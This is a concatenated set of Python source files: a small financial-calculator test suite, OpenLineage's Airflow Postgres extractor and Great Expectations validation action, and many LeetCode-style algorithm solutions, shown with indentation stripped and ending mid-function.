#### File: JoshHumpherey/Financial_Calculators/pytests.py
```python
import unittest
from unittest.mock import patch
import investment_growth
class InvestmentGrowthTests(unittest.TestCase):
""" Unit tests for investment_growth.py """
def test_get_quartile_data(self):
""" This tests to make sure that the quartiles are divded correctly. """
LOWER = 0
MID = 1
UPPER = 2
number_of_simulations = 100
expected_lower = 25
expected_middle = 50
expected_upper = 75
quartile_tuple = investment_growth.get_quartile_data(number_of_simulations)
self.assertEqual(expected_lower, quartile_tuple[LOWER])
self.assertEqual(expected_middle, quartile_tuple[MID])
self.assertEqual(expected_upper, quartile_tuple[UPPER])
def test_update_balance(self):
""" Test to make sure the investor balance updates correctly. """
current_year_tuple = (0.1, 0.1, 0.8)
iteration_balance = 90
contribution = 10
expected_result = 110
test_balance = investment_growth.update_balance(iteration_balance, contribution, current_year_tuple)
self.assertEqual(test_balance, expected_result)
def test_create_matrix(self):
""" Tests to make sure matrices are correctly created. """
test_matrix = investment_growth.create_matrix(5, 2)
self.assertEqual(0, test_matrix[1][4])
with self.assertRaises(Exception):
test_matrix[2][5]
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "joshi95/OpenLineage",
"score": 2
} |
#### File: airflow/extractors/postgres_extractor.py
```python
from contextlib import closing
from typing import Optional
from urllib.parse import urlparse
from airflow.hooks.postgres_hook import PostgresHook
from airflow.operators.postgres_operator import PostgresOperator
from openlineage.airflow.utils import get_normalized_postgres_connection_uri, get_connection
from openlineage.airflow.extractors.base import (
BaseExtractor,
StepMetadata
)
from openlineage.common.models import (
DbTableName,
DbTableSchema,
DbColumn
)
from openlineage.common.sql import SqlMeta, SqlParser
from openlineage.common.dataset import Source, Dataset
_TABLE_SCHEMA = 0
_TABLE_NAME = 1
_COLUMN_NAME = 2
_ORDINAL_POSITION = 3
# Use 'udt_name' which is the underlying type of column
# (ex: int4, timestamp, varchar, etc)
_UDT_NAME = 4
class PostgresExtractor(BaseExtractor):
operator_class = PostgresOperator
default_schema = 'public'
def __init__(self, operator):
super().__init__(operator)
self.conn = None
def extract(self) -> StepMetadata:
# (1) Parse sql statement to obtain input / output tables.
sql_meta: SqlMeta = SqlParser.parse(self.operator.sql, self.default_schema)
# (2) Get database connection
self.conn = get_connection(self._conn_id())
# (3) Default all inputs / outputs to current connection.
# NOTE: We'll want to look into adding support for the `database`
# property that is used to override the one defined in the connection.
source = Source(
scheme=self._get_scheme(),
authority=self._get_authority(),
connection_url=self._get_connection_uri()
)
database = self.operator.database
if not database:
database = self._get_database()
# (4) Map input / output tables to dataset objects with source set
# as the current connection. We need to also fetch the schema for the
# input tables to format the dataset name as:
# {schema_name}.{table_name}
inputs = [
Dataset.from_table(
source=source,
table_name=in_table_schema.table_name.name,
schema_name=in_table_schema.schema_name,
database_name=database
) for in_table_schema in self._get_table_schemas(
sql_meta.in_tables
)
]
outputs = [
Dataset.from_table_schema(
source=source,
table_schema=out_table_schema,
database_name=database
) for out_table_schema in self._get_table_schemas(
sql_meta.out_tables
)
]
return StepMetadata(
name=f"{self.operator.dag_id}.{self.operator.task_id}",
inputs=[ds.to_openlineage_dataset() for ds in inputs],
outputs=[ds.to_openlineage_dataset() for ds in outputs],
context={
'sql': self.operator.sql
}
)
def _get_connection_uri(self):
return get_normalized_postgres_connection_uri(self.conn)
def _get_scheme(self):
return 'postgres'
def _get_database(self) -> str:
if self.conn.schema:
return self.conn.schema
else:
parsed = urlparse(self.conn.get_uri())
return f'{parsed.path}'
def _get_authority(self) -> str:
if self.conn.host and self.conn.port:
return f'{self.conn.host}:{self.conn.port}'
else:
parsed = urlparse(self.conn.get_uri())
return f'{parsed.hostname}:{parsed.port}'
def _conn_id(self):
return self.operator.postgres_conn_id
def _information_schema_query(self, table_names: str) -> str:
return f"""
SELECT table_schema,
table_name,
column_name,
ordinal_position,
udt_name
FROM information_schema.columns
WHERE table_name IN ({table_names});
"""
def _get_hook(self):
return PostgresHook(
postgres_conn_id=self.operator.postgres_conn_id,
schema=self.operator.database
)
def _get_table_schemas(
self, table_names: [DbTableName]
) -> [DbTableSchema]:
# Avoid querying postgres by returning an empty array
# if no table names have been provided.
if not table_names:
return []
# Keeps track of the schema by table.
schemas_by_table = {}
hook = self._get_hook()
with closing(hook.get_conn()) as conn:
with closing(conn.cursor()) as cursor:
table_names_as_str = ",".join(map(
lambda name: f"'{name.name}'", table_names
))
cursor.execute(
self._information_schema_query(table_names_as_str)
)
for row in cursor.fetchall():
table_schema_name: str = row[_TABLE_SCHEMA]
table_name: DbTableName = DbTableName(row[_TABLE_NAME])
table_column: DbColumn = DbColumn(
name=row[_COLUMN_NAME],
type=row[_UDT_NAME],
ordinal_position=row[_ORDINAL_POSITION]
)
# Attempt to get table schema
table_key: str = f"{table_schema_name}.{table_name}"
table_schema: Optional[DbTableSchema] = schemas_by_table.get(table_key)
if table_schema:
# Add column to existing table schema.
schemas_by_table[table_key].columns.append(table_column)
else:
# Create new table schema with column.
schemas_by_table[table_key] = DbTableSchema(
schema_name=table_schema_name,
table_name=table_name,
columns=[table_column]
)
return list(schemas_by_table.values())
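# Hedged usage sketch (not part of the original module): the extractor wraps a
# PostgresOperator and reports lineage for the tables referenced in its SQL; the
# connection id and table names below are made up.
#   op = PostgresOperator(task_id='load_counts', postgres_conn_id='food_db',
#                         sql='INSERT INTO popular_orders SELECT * FROM orders;')
#   metadata = PostgresExtractor(op).extract()   # StepMetadata with inputs/outputs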
```
#### File: provider/great_expectations/action.py
```python
import logging
import os
from collections import defaultdict
from datetime import datetime
from typing import Optional, List
from urllib.parse import urlparse
from uuid import uuid4
from great_expectations.checkpoint import ValidationAction
from great_expectations.core import ExpectationSuiteValidationResult
from great_expectations.data_context.types.resource_identifiers import ValidationResultIdentifier
from great_expectations.dataset import SqlAlchemyDataset, PandasDataset, Dataset as GEDataset
from openlineage.client import OpenLineageClient, OpenLineageClientOptions
from openlineage.client.facet import ParentRunFacet, DocumentationJobFacet, \
SourceCodeLocationJobFacet, DataQualityMetricsInputDatasetFacet, ColumnMetric
from openlineage.client.run import RunEvent, RunState, Run, Job
from sqlalchemy import MetaData, Table
from sqlalchemy.engine import Connection
from openlineage.client.serde import Serde
from openlineage.common.dataset import Dataset, Source, Field
from openlineage.common.dataset import Dataset as OLDataset
from openlineage.common.provider.great_expectations.facets import \
GreatExpectationsAssertionsDatasetFacet, \
GreatExpectationsRunFacet
from openlineage.common.provider.great_expectations.results import EXPECTATIONS_PARSERS, \
COLUMN_EXPECTATIONS_PARSER, \
GreatExpectationsAssertion
from openlineage.common.sql import SqlParser
class OpenLineageValidationAction(ValidationAction):
"""
ValidationAction implementation which posts RunEvents for a GreatExpectations validation job.
OpenLineage host parameters can be passed in as constructor arguments; otherwise, environment variables
will be searched. Job information can optionally be passed in as constructor arguments or the
great expectations suite name and batch identifier will be used as the job name
(the namespace should be passed in as either a constructor arg or as an environment variable).
The data_asset will be inspected to determine the dataset source- SqlAlchemy datasets and
Pandas datasets are supported. SqlAlchemy datasets are typically treated as other SQL data
sources in OpenLineage. The database host and database name are treated as the data "source"
and the schema + table are treated as the table name. Columns are fetched when possible and the
schema will be posted as a facet. Some special handling for Bigquery is included, as "bigquery"
is always the data source, while the table name consists of "project.dataset.table".
Both the GreatExpectationsAssertionsDatasetFacet and DataQualityDatasetFacet are attached to
*each* dataset found in the data_asset (this includes tables that are joined in a `custom_sql`
argument). The DataQualityDatasetFacet is also posted as the more standard OpenLineage
DataQualityMetricsInputDatasetFacet.
The resulting RunEvent is returned from the _run method, so it can be seen in the
actions_results field of the validation results.
"""
def __init__(self, data_context,
openlineage_host=None,
openlineage_namespace=None,
openlineage_apiKey=None,
openlineage_parent_run_id=None,
openlineage_parent_job_namespace=None,
openlineage_parent_job_name=None,
job_name=None,
job_description=None,
code_location=None,
openlineage_run_id=None,
do_publish=True):
super().__init__(data_context)
if openlineage_host is not None:
self.openlineage_client = OpenLineageClient(openlineage_host,
OpenLineageClientOptions(
api_key=openlineage_apiKey))
else:
self.openlineage_client = OpenLineageClient.from_environment()
if openlineage_namespace is not None:
self.namespace = openlineage_namespace
else:
self.namespace = os.getenv('OPENLINEAGE_NAMESPACE', 'default')
if openlineage_run_id is not None:
self.run_id = openlineage_run_id
else:
self.run_id = uuid4()
self.parent_run_id = openlineage_parent_run_id
self.parent_job_namespace = openlineage_parent_job_namespace
self.parent_job_name = openlineage_parent_job_name
self.job_name = job_name
self.job_description = job_description
self.code_location = code_location
self.do_publish = do_publish
def _run(self, validation_result_suite: ExpectationSuiteValidationResult,
validation_result_suite_identifier: ValidationResultIdentifier,
data_asset: GEDataset,
payload=None):
# Initialize logger here so that the action is serializable until it actually runs
self.log = logging.getLogger(self.__class__.__module__ + '.' + self.__class__.__name__)
datasets = []
if isinstance(data_asset, SqlAlchemyDataset):
datasets = self._fetch_datasets_from_sql_source(data_asset, validation_result_suite)
elif isinstance(data_asset, PandasDataset):
datasets = self._fetch_datasets_from_pandas_source(data_asset, validation_result_suite)
run_facets = {}
if self.parent_run_id is not None:
run_facets.update({"parentRun": ParentRunFacet.create(
self.parent_run_id,
self.parent_job_namespace,
self.parent_job_name
)})
run_facets.update(
{"great_expectations_meta": GreatExpectationsRunFacet(**validation_result_suite.meta)})
job_facets = {}
if self.job_description:
job_facets.update({
"documentation": DocumentationJobFacet(self.job_description)
})
if self.code_location:
job_facets.update({
"sourceCodeLocation": SourceCodeLocationJobFacet("", self.code_location)
})
job_name = self.job_name
if self.job_name is None:
job_name = validation_result_suite.meta["expectation_suite_name"] + '.' \
+ validation_result_suite_identifier.batch_identifier
run_event = RunEvent(
eventType=RunState.COMPLETE,
eventTime=datetime.now().isoformat(),
run=Run(runId=str(self.run_id), facets=run_facets),
job=Job(self.namespace, job_name, facets=job_facets),
inputs=datasets,
outputs=[],
producer="https://github.com/OpenLineage/OpenLineage/tree/$VERSION/integration/common/openlineage/provider/great_expectations" # noqa
)
if self.do_publish:
self.openlineage_client.emit(run_event)
# Great expectations tries to append stuff here, so we need to make it a dict
return Serde.to_dict(run_event)
def _fetch_datasets_from_pandas_source(self, data_asset: PandasDataset,
validation_result_suite: ExpectationSuiteValidationResult) -> List[OLDataset]: # noqa
"""
Generate a list of OpenLineage Datasets from a PandasDataset
:param data_asset:
:param validation_result_suite:
:return:
"""
if data_asset.batch_kwargs.__contains__("path"):
path = data_asset.batch_kwargs.get("path")
if path.startswith("/"):
path = "file://{}".format(path)
parsed_url = urlparse(path)
columns = [Field(
name=col,
type=str(data_asset[col].dtype) if data_asset[col].dtype is not None else 'UNKNOWN'
) for col in data_asset.columns]
return [
Dataset(
source=self._source(parsed_url._replace(path='')),
name=parsed_url.path,
fields=columns,
input_facets=self.results_facet(validation_result_suite)
).to_openlineage_dataset()
]
def _fetch_datasets_from_sql_source(self, data_asset: SqlAlchemyDataset,
validation_result_suite: ExpectationSuiteValidationResult) -> List[OLDataset]: # noqa
"""
Generate a list of OpenLineage Datasets from a SqlAlchemyDataset.
:param data_asset:
:param validation_result_suite:
:return:
"""
metadata = MetaData()
if data_asset.generated_table_name is not None:
custom_sql = data_asset.batch_kwargs.get('query')
parsed_sql = SqlParser.parse(custom_sql)
return [
self._get_sql_table(data_asset, metadata, t.schema, t.name,
validation_result_suite) for t in
parsed_sql.in_tables
]
return [self._get_sql_table(data_asset, metadata, data_asset._table.schema,
data_asset._table.name,
validation_result_suite)]
def _get_sql_table(self, data_asset: SqlAlchemyDataset,
meta: MetaData,
schema: str,
table_name: str,
validation_result_suite: ExpectationSuiteValidationResult) -> Optional[OLDataset]: # noqa
"""
Construct a Dataset from the connection url and the columns returned from the
SqlAlchemyDataset
:param data_asset:
:return:
"""
engine = data_asset.engine
if isinstance(engine, Connection):
engine = engine.engine
datasource_url = engine.url
if engine.dialect.name.lower() == "bigquery":
schema = '{}.{}'.format(datasource_url.host, datasource_url.database)
table = Table(table_name, meta, autoload_with=engine)
fields = [Field(
name=key,
type=str(col.type) if col.type is not None else 'UNKNOWN',
description=col.doc
) for key, col in table.columns.items()]
name = table_name \
if schema is None \
else "{}.{}".format(schema, table_name)
results_facet = self.results_facet(validation_result_suite)
return Dataset(
source=self._source(urlparse(str(datasource_url))),
fields=fields,
name=name,
input_facets=results_facet
).to_openlineage_dataset()
def _source(self, url) -> Source:
"""
Construct a Source from the connection url. Special handling for BigQuery is included.
We attempt to strip credentials from the connection url, if present.
:param url: a parsed url, as returned from urlparse()
:return:
"""
if url.scheme == "bigquery":
return Source(
scheme='bigquery',
connection_url='bigquery'
)
return Source(
scheme=url.scheme,
authority=url.hostname,
# Remove credentials from the URL if present
connection_url=url._replace(netloc=url.hostname, query=None, fragment=None).geturl()
)
def results_facet(self, validation_result: ExpectationSuiteValidationResult):
"""
Parse the validation result and extract input facets based on the results. We'll return a
DataQualityDatasetFacet, a GreatExpectationsAssertionsDatasetFacet, and a
(openlineage standard) DataQualityMetricsInputDatasetFacet
:param validation_result:
:return:
"""
try:
data_quality_facet = self.parse_data_quality_facet(validation_result)
if not data_quality_facet:
return None
assertions_facet = self.parse_assertions(validation_result)
if not assertions_facet:
return None
return {
'dataQuality': data_quality_facet,
'greatExpectations_assertions': assertions_facet,
'dataQualityMetrics': data_quality_facet
}
except ValueError:
self.log.exception("Exception while retrieving great expectations dataset")
return None
def parse_data_quality_facet(self, validation_result: ExpectationSuiteValidationResult) \
-> Optional[DataQualityMetricsInputDatasetFacet]:
"""
Parse the validation result and extract a DataQualityDatasetFacet
:param validation_result:
:return:
"""
facet_data = {
"columnMetrics": defaultdict(dict)
}
# try to get to actual expectations results
try:
expectations_results = validation_result['results']
for expectation in expectations_results:
for parser in EXPECTATIONS_PARSERS:
# accept possible duplication, should have no difference in results
if parser.can_accept(expectation):
result = parser.parse_expectation_result(expectation)
facet_data[result.facet_key] = result.value
for parser in COLUMN_EXPECTATIONS_PARSER:
if parser.can_accept(expectation):
result = parser.parse_expectation_result(expectation)
facet_data['columnMetrics'][result.column_id][result.facet_key] \
= result.value
for key in facet_data['columnMetrics'].keys():
facet_data['columnMetrics'][key] = ColumnMetric(**facet_data['columnMetrics'][key])
return DataQualityMetricsInputDatasetFacet(**facet_data)
except ValueError:
self.log.exception(
"Great Expectations's CheckpointResult object does not have expected key"
)
return None
def parse_assertions(self, validation_result: ExpectationSuiteValidationResult) -> \
Optional[GreatExpectationsAssertionsDatasetFacet]:
assertions = []
try:
for expectation in validation_result.results:
assertions.append(GreatExpectationsAssertion(
expectationType=expectation['expectation_config']['expectation_type'],
success=expectation['success'],
column=expectation['expectation_config']['kwargs'].get('column', None)
))
return GreatExpectationsAssertionsDatasetFacet(assertions)
except ValueError:
self.log.exception(
"Great Expectations's CheckpointResult object does not have expected key"
)
return None
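# Hedged usage sketch (not part of the original module): the action is normally
# declared in a Great Expectations checkpoint's action_list, but it can also be
# built directly; the host, namespace and job name below are made up.
#   action = OpenLineageValidationAction(
#       context,                               # a great_expectations DataContext
#       openlineage_host='http://localhost:5000',
#       openlineage_namespace='my_namespace',
#       job_name='validate_orders')
#   # Great Expectations then invokes action.run(...) after each validation,
#   # which ends up in _run() above and emits a COMPLETE RunEvent.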
``` |
{
"source": "joshiaj7/CodingChallenges",
"score": 3
} |
#### File: CodingChallenges/python3/add_binary.py
```python
class Solution:
def addBinary(self, a: str, b: str) -> str:
res = ''
len_a = len(a)
len_b = len(b)
store = 0
if len_a > len_b:
b = ('0' * (len_a - len_b)) + b
len_b = len_a
elif len_a < len_b:
a = ('0' * (len_b - len_a)) + a
len_a = len_b
for i in range(len_a-1, -1, -1):
total = store + int(a[i]) + int(b[i])
if total < 2:
store = 0
elif total >= 2:
store = 1
res = str(total % 2) + res
if store == 1:
res = str(store) + res
return res
```
#### File: CodingChallenges/python3/add_digits.py
```python
class Solution:
def addDigits(self, num: int) -> int:
if num < 10:
return num
while len(str(num)) > 1:
n = str(num)
temp = 0
for i in n:
temp += int(i)
num = temp
return num
```
#### File: CodingChallenges/python3/add_two_numbers.py
```python
from .model import ListNode
"""
Space : O(1)
Time : O(n)
"""
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:
p1, p2 = l1, l2
v1, v2 = 0, 0
mul = 1
while p1:
v1 = v1 + (p1.val * mul)
mul *= 10
p1 = p1.next
mul = 1
while p2:
v2 = v2 + (p2.val * mul)
mul *= 10
p2 = p2.next
tot = str(v1 + v2)
ans = ListNode(0)
point = ans
for i in range(len(tot)-1, -1, -1):
point.next = ListNode(int(tot[i]))
point = point.next
return ans.next
```
#### File: CodingChallenges/python3/arithmetic_slices.py
```python
class Solution:
def numberOfArithmeticSlices(self, A: List[int]) -> int:
ans = 0
temp = []
n = len(A)
if n < 3:
return 0
for i in range(1, n):
temp.append(A[i] - A[i-1])
count = 0
for j in range(1, len(temp)):
if temp[j] == temp[j-1]:
count += 1
else:
count = 0
ans += count
return ans
```
#### File: CodingChallenges/python3/arrange_coins.py
```python
class Solution:
def arrangeCoins(self, n: int) -> int:
ans, count = 0, 0
add = 1
while count < n:
count += add
add += 1
ans += 1
if count > n:
ans -= 1
return ans
```
#### File: CodingChallenges/python3/asteroid_collision.py
```python
class Solution:
def asteroidCollision(self, asteroids: List[int]) -> List[int]:
stack = []
for e in asteroids:
if not stack or stack[-1] < 0 or e > 0:
stack.append(e)
else:
flag = True
while stack and stack[-1] > 0 and stack[-1] <= -e:
tmp = stack.pop()
if tmp == -e:
flag = False
break
if (not stack or stack[-1] < 0) and flag:
stack.append(e)
return stack
```
#### File: CodingChallenges/python3/average_of_levels_in_binary_tree.py
```python
class Solution:
def averageOfLevels(self, root: TreeNode) -> List[float]:
ans = []
stack = [root]
while stack:
val = 0
temp = []
for node in stack:
val += node.val
if node.left:
temp.append(node.left)
if node.right:
temp.append(node.right)
ans.append(val / len(stack))
stack = temp
return ans
```
#### File: CodingChallenges/python3/bag_of_tokens.py
```python
class Solution:
def bagOfTokensScore(self, tokens: List[int], P: int) -> int:
score = 0
n = len(tokens)
dp = [0] * n
tokens = sorted(tokens)
s, e = 0, len(tokens)-1
while s <= e:
if P - tokens[s] >= 0:
P -= tokens[s]
dp[s] += 1
s += 1
score += 1
else:
if score > 0:
cost = 0
while P < tokens[s]:
P += tokens[e]
score -= 1
cost += 1
e -= 1
if score == 0:
break
dp[s] -= cost
else:
break
ans = 0
count = 0
for i in dp:
count += i
ans = max(ans, count)
return ans
```
#### File: CodingChallenges/python3/beautiful_arrangement_II.py
```python
class Solution:
def constructArray(self, n: int, k: int) -> List[int]:
s, e = 2, n
ans = [1]
while s <= e:
if k > 1:
if ans[-1] == s-1:
ans.append(e)
e -= 1
elif ans[-1] == e+1:
ans.append(s)
s += 1
k -= 1
else:
if ans[-1] == s-1:
ans.append(s)
s += 1
elif ans[-1] == e+1:
ans.append(e)
e -= 1
return ans
```
#### File: CodingChallenges/python3/beautiful_arrangement.py
```python
class Solution:
def countArrangement(self, n: int) -> int:
ans = 0
def dfs(i, cands):
nonlocal ans
if i <= 1:
ans += 1
return
for j, x in enumerate(cands):
if i % x == 0 or x % i == 0:
dfs(i-1, cands[:j] + cands[j+1:])
dfs(n, list(range(1, n+1)))
return ans
```
#### File: CodingChallenges/python3/best_time_stock1.py
```python
class Solution:
def maxProfit(self, prices: List[int]) -> int:
start, dp = 10**10, 0
for i in prices:
start = min(start, i)
dp = max(dp, i-start)
return dp
```
#### File: CodingChallenges/python3/binary_number_with_alternating_bits.py
```python
class Solution:
def hasAlternatingBits(self, n: int) -> bool:
if n <= 1:
return True
bit = bin(n)[2:]
truth = bit[0]
for i in range(1, len(bit)):
if bit[i] != truth:
truth = bit[i]
else:
return False
return True
```
#### File: CodingChallenges/python3/binary_tree_level_order_traversal_ii.py
```python
from .model import TreeNode
"""
Space : O(n)
Time : O(n)
"""
class Solution:
def levelOrderBottom(self, root: TreeNode) -> List[List[int]]:
if not root:
return []
ans = []
stack = [root]
while stack:
temp = []
l = []
for x in stack:
l.append(x.val)
if x.left:
temp.append(x.left)
if x.right:
temp.append(x.right)
ans.insert(0, l)
stack = temp
return ans
```
#### File: CodingChallenges/python3/boats_to_save_people.py
```python
class Solution:
def numRescueBoats(self, people: List[int], limit: int) -> int:
"""
Beats 10%
Time : O(n)
Space : O(n)
"""
ans = 0
d = {}
max_w, min_w = 0, 30000
for x in people:
if x not in d:
d[x] = 1
else:
d[x] += 1
max_w = max(max_w, x)
min_w = min(min_w, x)
for i in range(min_w, max_w):
if i not in d:
d[i] = 0
s, e = min_w, max_w
while s < e:
if s + e > limit:
ans += d[e]
d[e] = 0
e -= 1
else:
if d[s] == 0:
s += 1
continue
if d[e] == 0:
e -= 1
continue
slices = min(d[s], d[e])
ans += slices
d[s] -= slices
d[e] -= slices
if d[s] == 0:
s += 1
if d[e] == 0:
e -= 1
if d[s] > 0:
if 2 * s <= limit:
ans += d[s] // 2
ans += d[s] % 2
else:
ans += d[s]
return ans
def numRescueBoatsBest(self, people: List[int], limit: int) -> int:
"""
Beats 30%
Time : O(n log n)
Space : O(1)
"""
ans = 0
people.sort()
s, e = 0, len(people)-1
while s <= e:
if people[s] + people[e] <= limit:
s += 1
e -= 1
ans += 1
return ans
```
#### File: CodingChallenges/python3/build_baloon_from_letters.py
```python
def solution(S):
ans = 0
truthmap = {
'B': 1,
'A': 1,
'L': 2,
'O': 2,
'N': 1,
}
hashmap = {}
for i in S:
if i not in hashmap:
hashmap[i] = 1
else:
hashmap[i] += 1
exist = True
while exist:
for key, val in truthmap.items():
if key in hashmap:
if hashmap[key] - val >= 0:
hashmap[key] -= val
else:
exist = False
break
else:
exist = False
if exist:
ans += 1
return ans
print(solution("BALLOONBALLOONXXBALON"))
print(solution("ALEMEN"))
```
#### File: CodingChallenges/python3/bulls_and_cows.py
```python
class Solution:
def getHint(self, secret: str, guess: str) -> str:
hashmap = {}
A, B = 0, 0
guess = list(guess)
for x in secret:
if x not in hashmap:
hashmap[x] = 1
else:
hashmap[x] += 1
for i in range(len(secret)):
if secret[i] == guess[i]:
A += 1
hashmap[secret[i]] -= 1
guess[i] = 'x'
for y in guess:
if y == 'x':
continue
if y in hashmap:
if hashmap[y] > 0:
hashmap[y] -= 1
B += 1
return "{}A{}B".format(A, B)
```
#### File: CodingChallenges/python3/climbing_stairs.py
```python
class Solution:
def climbStairs(self, n: int) -> int:
dp = [0] * 3
dp[0] = 1
dp[1] = 1
dp[2] = 2
if n < 3:
return dp[n]
dp = dp + ([0] * (n-2))
for i in range(3, n+1):
dp[i] = dp[i-1] + dp[i-2]
return dp[n]
```
#### File: CodingChallenges/python3/combination_sum_3.py
```python
from itertools import combinations
"""
Space : O(n)
Time : O(n!)
"""
class Solution:
def combinationSum3(self, k: int, n: int) -> List[List[int]]:
ans = []
for item in combinations(range(1, 10), k):
temp = list(item)
if sum(temp) == n:
ans.append(temp)
return ans
```
#### File: CodingChallenges/python3/contains_duplicate_3.py
```python
class Solution:
def containsNearbyAlmostDuplicate(self, nums: List[int], k: int, t: int) -> bool:
if t == 0 and len(nums) == len(set(nums)):
return False
for i, cur_val in enumerate(nums):
for j in range(i+1, min(i+k+1, len(nums))):
if abs(cur_val - nums[j]) <= t:
return True
return False
```
#### File: CodingChallenges/python3/contains_duplicate.py
```python
class Solution:
def containsDuplicate(self, nums: List[int]) -> bool:
set_nums = set(nums)
if len(set_nums) < len(nums):
return True
else:
return False
```
#### File: CodingChallenges/python3/convert_to_base7.py
```python
class Solution:
def convertToBase7(self, num: int) -> str:
ans = ''
multi = 1
isNeg = num < 0
num = abs(num)
while multi * 7 <= num:
multi *= 7
while multi >= 1:
ans += str(num // multi)
if num >= 0:
num = int(num % multi)
else:
ans += str(num)
multi //= 7
if isNeg:
ans = '-' + ans
return ans
```
#### File: CodingChallenges/python3/copy_list_with_random_pointer.py
```python
from .model import RandListNode
"""
Space : O(2n)
Time : O(2n)
"""
class Solution:
def copyRandomList(self, head: RandListNode) -> RandListNode:
p = head
# create interweaved list
while p:
# save value to next creation
value = p.val
temp = p.next
# insert copied current node
p.next = RandListNode(value)
p = p.next
# point back to original next
p.next = temp
p = p.next
# migrate random node
p = head
while p:
if p.random:
# save rand
rand = p.random
# insert rand to new rand
p = p.next
p.random = rand.next
p = p.next
else:
p = p.next.next
# create new node
ans = RandListNode(0)
a = ans
p = head
while p:
# move next
p = p.next
# insert to ans
a.next = p
# move to next element
a = a.next
p = p.next
return ans.next
```
#### File: CodingChallenges/python3/count_binary_substrings.py
```python
class Solution:
def countBinarySubstrings(self, s: str) -> int:
ans = 0
last = s[0]
one = 1 if s[0] == '1' else 0
zero = 1 if s[0] == '0' else 0
n = len(s)
for i in range(1, n):
if s[i] != last:
ans += min(one, zero)
if s[i] == '0':
zero = 1
else:
one = 1
else:
if s[i] == '0':
zero += 1
else:
one += 1
last = s[i]
ans += min(one, zero)
return ans
```
#### File: CodingChallenges/python3/determine_if_string_halves_are_alike.py
```python
class Solution:
def halvesAreAlike(self, s: str) -> bool:
n = len(s)
v1, v2 = 0, 0
for i in range(n//2):
if s[i].lower() in ['a', 'e', 'i', 'o', 'u']:
v1 += 1
if s[i+(n//2)].lower() in ['a', 'e', 'i', 'o', 'u']:
v2 += 1
return v1 == v2
```
#### File: CodingChallenges/python3/divide_two_integers.py
```python
class Solution:
def divide(self, dividend: int, divisor: int) -> int:
if dividend == 0:
return 0
is_neg = True if dividend < 0 else False
is_neg ^= True if divisor < 0 else False
dividend = abs(dividend)
divisor = abs(divisor)
ans, count = 0, 1
temp = divisor
while (divisor << 1) <= dividend:
divisor <<= 1
count *= 2
while dividend >= divisor and dividend > 0:
dividend -= divisor
ans += count
while dividend < divisor:
divisor >>= 1
count >>= 1
if divisor < temp:
break
if is_neg:
return -1 * min(ans, (2 ** 31))
return min(ans, (2**31) - 1)
```
#### File: CodingChallenges/python3/duplicate_zeros.py
```python
class Solution:
def duplicateZeros(self, arr: List[int]) -> None:
"""
Do not return anything, modify arr in-place instead.
"""
n = len(arr)
stack = []
i = 0
while i < n:
if arr[i] == 0:
stack.append(0)
stack.append(arr[i])
i += 1
for j in range(n):
arr[j] = stack[j]
```
#### File: CodingChallenges/python3/even_numbers.py
```python
class Solution:
def findNumbers(self, nums: List[int]) -> int:
ans = 0
for i in nums:
if len(str(i)) % 2 == 0:
ans += 1
return ans
```
#### File: CodingChallenges/python3/find_and_replace_pattern.py
```python
class Solution:
def findAndReplacePattern(self, words: List[str], pattern: str) -> List[str]:
ans = []
pn = len(pattern)
for word in words:
if len(word) != pn:
continue
mem1, mem2 = {}, {}
defect = False
for i in range(pn):
if word[i] not in mem1:
mem1[word[i]] = pattern[i]
elif mem1[word[i]] != pattern[i]:
defect = True
break
if pattern[i] not in mem2:
mem2[pattern[i]] = word[i]
elif mem2[pattern[i]] != word[i]:
defect = True
break
if defect:
continue
if len(mem1) == len(mem2):
ans.append(word)
return ans
```
#### File: CodingChallenges/python3/find_first_and_last_position_of_element_in_sorted_array.py
```python
class Solution:
def searchRange(self, nums: List[int], target: int) -> List[int]:
ans = [-1, -1]
s, e = 0, len(nums)-1
if not nums:
return ans
while s < e:
m = (s + e) // 2
if nums[m] < target:
s = m + 1
else:
e = m
if nums[e] != target:
return [-1, -1]
ans[0] = e
e = len(nums)-1
while s < e:
m = ((s + e) // 2)+1
if nums[m] <= target:
s = m
else:
e = m - 1
ans[1] = e
return ans
```
#### File: CodingChallenges/python3/find_the_most_competitive_subsequence.py
```python
class Solution:
def mostCompetitive(self, nums: List[int], k: int) -> List[int]:
stack = []
i = 0
n = len(nums)
while i < n:
while stack and nums[i] < stack[-1] and n-i+len(stack) > k:
stack.pop()
if len(stack) < k:
stack.append(nums[i])
i += 1
return stack
```
#### File: CodingChallenges/python3/fizzbuzz.py
```python
class Solution:
def fizzBuzz(self, n: int) -> List[str]:
ans = []
for i in range(1, n+1):
word = ''
if i % 3 == 0:
word += 'Fizz'
if i % 5 == 0:
word += "Buzz"
if word == '':
word = str(i)
ans.append(word)
return ans
```
#### File: CodingChallenges/python3/flipping_an_image.py
```python
class Solution:
def flipAndInvertImage(self, A: List[List[int]]) -> List[List[int]]:
for row in A:
for i in range((len(row) + 1) // 2):
"""
In Python, the shortcut row[~i] = row[-i-1] = row[len(row) - 1 - i]
helps us find the i-th value of the row, counting from the right.
"""
row[i], row[~i] = row[~i] ^ 1, row[i] ^ 1
return A
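# Hedged illustration (not part of the original solution) of the row[~i] trick:
# for row = [1, 1, 0] and i = 0, row[~0] is row[-1], so the one-pass swap-and-XOR
# turns [1, 1, 0] into [1, 0, 0] (reverse, then invert).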
```
#### File: CodingChallenges/python3/hamming_distance.py
```python
class Solution:
def hammingDistance(self, x: int, y: int) -> int:
ans = 0
xor = bin(x^y)[2:]
for l in xor:
if l == '1':
ans += 1
return ans
```
#### File: CodingChallenges/python3/house_robber_ii.py
```python
class Solution:
def rob(self, nums: List[int]) -> int:
if len(nums) == 1:
return nums[0]
if len(nums) == 0:
return 0
ans = 0
leng = len(nums)-1
one, two = [0] * leng, [0] * leng
# 1st iteration
for idx in range(leng):
if idx < 2:
one[idx] = nums[idx]
else:
one[idx] = nums[idx] + max(one[idx-2], one[idx-3])
ans = max(ans, one[idx])
# 2nd iteration
for idx in range(leng):
if idx < 2:
two[idx] = nums[idx+1]
else:
two[idx] = nums[idx+1] + max(two[idx-2], two[idx-3])
ans = max(ans, two[idx])
return ans
```
#### File: CodingChallenges/python3/increasing_order_search_tree.py
```python
from .model import TreeNode
"""
Space : O(n)
Time : O(n)
"""
class Solution:
def getInorder(self, root) -> List[int]:
res = []
if root:
res += self.getInorder(root.left)
res.append(root.val)
res += self.getInorder(root.right)
return res
def increasingBST(self, root: TreeNode) -> TreeNode:
if not root:
